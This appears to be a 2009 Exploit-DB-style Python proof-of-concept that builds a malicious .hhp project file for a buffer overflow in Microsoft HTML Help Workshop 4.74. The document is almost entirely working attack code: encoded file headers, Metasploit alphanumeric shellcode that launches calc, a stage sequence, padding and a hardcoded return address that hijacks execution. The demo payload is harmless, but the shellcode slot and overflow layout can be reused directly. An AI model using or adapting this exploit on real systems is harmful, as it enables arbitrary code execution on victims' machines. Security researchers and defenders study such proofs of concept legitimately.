# Exploit Title: HTML Help Workshop 4.74 (hhp) Buffer Overflow Exploit (Universal)
# Date: 2009-12-05
# Author: Dz_attacker
# Software Link: http://www.microsoft.com/downloads/details.aspx?FamilyID=00535334-c8a6-452f-9aa0-d597d16580cc&displaylang=en
# Version: 4.74
# Tested on: xp sp3,sp2, w2k
# Code:
#!/usr/bin/python
#[x] Note: the exploit its universal and doesn't use any egghunter so the shellcode is immidiatly opened!
header1=(
"\x5b\x4f\x50\x54\x49\x4f\x4e\x53\x5d\x0d\x0a\x43\x6f\x6d\x70\x61\x74\x69\x62\x69"
"\x6c\x69\x74\x79\x3d\x31\x2e\x31\x20\x6f\x72\x20\x6c\x61\x74\x65\x72\x0d\x0a\x43"
"\x6f\x6d\x70\x69\x6c\x65\x64\x20\x66\x69\x6c\x65\x3d\x74\x65\x73\x74\x2e\x63\x68"
"\x6d\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x66\x69\x6c\x65\x3d\x74\x65\x73"
"\x74\x2e\x68\x68\x63\x0d\x0a\x44\x65\x66\x61\x75\x6c\x74\x20\x74\x6f\x70\x69\x63"
"\x3d")

header2=(
"\x44\x69\x73\x70\x6c\x61\x79\x20\x63\x6f\x6d\x70\x69\x6c\x65\x20\x70\x72\x6f\x67"
"\x72\x65\x73\x73\x3d\x4e\x6f\x0d\x0a\x49\x6e\x64\x65\x78\x20\x66\x69\x6c\x65\x3d")

header3= "\x4c\x61\x6e\x67\x75\x61\x67\x65\x3d\x30\x78\x34\x30\x39\x20"

header4=(
"\x20\x28\x55\x6e\x69\x74\x65\x64\x20\x53\x74\x61\x74\x65\x73\x29\x0d\x0a\x0d\x0a"
"\x0d\x0a\x5b\x46\x49\x4c\x45\x53\x5d\x0d\x0a\x74\x65\x73\x74\x2e\x68\x74\x6d\x0d"
"\x0a\x0d\x0a\x5b\x49\x4e\x46\x4f\x54\x59\x50\x45\x53\x5d\x0d\x0a\x0d\x0a")


# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x30\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58"
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x43\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x38"
"\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34"
"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x31\x4b\x48"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x48\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x53\x4f\x35\x41\x33"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x45\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x56\x43\x56\x42\x30\x5a")

stage   =    "\x81\xEE\x5A\x55\x55\x55"
stage  +=   "\x81\xEE\x4A\x45\x45\x45"
stage  +=   "\x81\xEE\x0B\xE5\x65\x65"
stage  +=   "\x56\xC3"

payload =  header1
payload += shellcode
payload += "\x44"*(1100-len(shellcode))+"\x0d\x0a"
payload += header2
payload += stage
payload += "A" * (280-len(stage))
payload += "\x7F\x13\x40\x00" #0040137F
payload += "\x0d\x0a"
payload += header3
payload += "\x42"*1100
payload += header4

file = open("exploit.hhp","w")
file.write(payload)
file.close()